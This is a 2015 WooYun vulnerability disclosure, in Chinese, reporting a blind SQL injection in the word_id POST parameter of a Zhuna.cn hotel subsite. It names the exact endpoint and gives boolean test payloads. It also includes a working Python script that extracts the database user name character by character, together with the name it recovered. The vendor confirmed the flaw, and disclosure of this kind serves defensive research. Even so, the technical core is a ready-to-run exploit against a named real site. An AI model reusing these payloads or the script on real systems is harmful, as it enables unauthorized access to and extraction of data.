当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102039

漏洞标题:住哪网某分站SQL注入三(附验证脚本)

相关厂商:住哪网

漏洞作者: D_in

提交时间:2015-03-18 09:30

修复时间:2015-05-02 09:34

公开时间:2015-05-02 09:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-05-02: 细节向公众公开

简要描述:

rt

详细说明:

问题出在:http://guoji.zhuna.cn/theme-friend
此页面的红心那个功能处

http://guoji.zhuna.cn/special_theme/theme_word_positive_add/
post:
word_id=149


1.png


这个站有360防护脚本

2.png


word_id=149 and -1=-1 页面正确

3.png


word_id=149 and -1=-2 页面错误

4.png


可看出存在注入

漏洞证明:

漏洞验证脚本

#encoding=utf-8
import time
import string
import sys
import random
import urllib
import urllib2
data={}
def http_conn(url):
url_test='http://guoji.zhuna.cn/special_theme/theme_word_positive_add/'+url
data['word_id']='140'+url
post_data=urllib.urlencode(data)
req=urllib2.urlopen(url_test,post_data)
html_doc=req.read()
if html_doc.find('error')<0:
return True
else:
return False
username=''
payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
for i in range(1,19,1):
for payload in payloads:
url=" and ascii(substring(user_name(),%s,1))=%s" % (i,str(ord(payload)))
print url
if http_conn(url)==True:
username+=payload
print 'user_name:'+username
break


5.png


数据库用户名为:global_hotel_write

修复方案:

过滤

版权声明:转载请注明来源 D_in@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-18 09:33

厂商回复:

非常感谢您反馈的信息,相关问题已交技术处理。

最新状态:

暂无